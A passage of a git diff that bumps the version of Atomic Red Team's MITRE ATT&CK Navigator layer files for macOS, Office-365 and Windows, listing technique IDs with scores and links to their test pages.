17.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/at
omics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T
1546.005/T1546.005.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob
/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-
red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]} \ No newline at end of file +{"version":"4.2","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator 
Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}
,{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.003"
,"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070
.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"
T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"ena
bled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/at
omic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomi
c-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redc
anaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https:
//github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
index ca1d359c..c35e563a 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 2dc3ea92..af1e579f 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 